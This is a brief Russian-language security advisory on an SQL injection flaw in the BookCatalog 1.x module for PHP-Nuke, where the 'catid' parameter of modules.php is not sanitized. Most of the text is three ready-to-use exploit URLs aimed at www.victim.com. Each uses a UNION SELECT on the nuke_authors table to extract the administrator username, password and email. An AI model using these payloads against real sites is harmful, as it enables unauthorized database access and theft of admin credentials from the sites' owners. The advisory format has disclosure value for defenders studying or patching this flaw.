Программа: BookCatalog 1.x (module for PHP-Nuke)

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "catid" сценарием modules.php (когда "name"
установлен в "BookCatalog" и "op" установлен в "category") . Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

Для получения username:

www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,aid+from+nuke_authors—

Для получения password:

www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,pwd+from+nuke_authors—

Для получения E-mail:

www.victim.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,email+from+nuke_authors—



Оставить мнение